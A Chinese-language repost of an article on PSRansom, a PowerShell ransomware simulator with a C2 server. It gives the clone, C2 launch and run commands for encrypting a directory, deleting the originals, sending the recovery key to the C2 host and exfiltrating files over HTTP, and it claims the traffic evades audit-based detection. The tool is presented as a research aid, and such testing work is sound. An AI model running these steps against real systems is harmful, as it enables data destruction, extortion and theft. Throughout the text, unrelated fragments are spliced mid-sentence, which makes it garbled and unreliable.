关于PSRansomPSRansom是何使一款带有C2服务器功能的PowerShell勒索软件模拟工具,该工具可以帮助广大研究人员模拟针对任何操作系统平台(只要安装了PowerShell即可)的进件安通用勒索软件数据加密过程。在C2服务器功能的行勒析帮助下,我们甚至还可以通过HTTP从目标设备(客户端)中提取文件,索软并在服务器端接收信息。全分 客户端和服务器端之间的何使通信数据都经过了加密和编码,因此是进件安无法被基于流量审计的检查工具所检测到的。 工具要求PowerShell 4.0或更高版本 工具下载广大研究人员可以使用下列命令将该项目源码克隆至本地:git clone https://github.com/JoelGMSec/PSRansom 或者直接访问该项目的行勒析【Releases页面】下载工具的压缩文件。 下载完成之后,索软我们将拿到两个脚本:PSRansom和C2Server。全分第一个将模拟勒索软件感染,何使而第二个将负责恢复文件及其恢复密钥。源码库进件安 工具使用该工具的行勒析使用非常简单,我们只需要指明要加密的索软目录、C2 服务器的全分 IP 或主机名以及接收连接的端口。 除此之外,如果我们需要发送加密文件,则需要在命令结尾添加-x参数选项即可。在解密的时候,只需要指明目录和恢复密钥即可。 
工具使用样例首先,我们的测试场景定义如下: 勒索软件将在 Windows 机器上运行我们要加密的文件夹位于 C:\BackupC2 服务器将在 Kali Linux 上运行所有流量都将通过代理查看详细信息接下来,我们看看该工具提供了哪些操作选项: 
命令和控制服务器的使用也非常简单,我们只需要指明监听连接的端口和接收连接的b2b供应网端口即可。这里,我们使用的是80端口: 复制pwsh C2Server.ps1 + 801. 
接下来,我们将使用以下命令运行加密和渗透: 复制.\PSRansom.ps1 -e directory -s ServerC2 -p port -x1. 
此时将生成24 个字母数字字符(小写、大写和数字)的随机密钥,数据将以 AES256 加密,并将恢复密钥发送到 C2 服务器。 完成后,原始文件将被删除,仅保留加密的文件: 
服务器端将接收到类似如下图所示的内容: 
现在,我们将在服务器端接收到目标设备的信息、恢复密钥、加密文件列表等: 
许可证协议本项目的开发与发布遵循GPL-3.0开源许可证协议。 项目地址PSRansom:【GitHub传送门】 源码下载 | 
喜欢
讨厌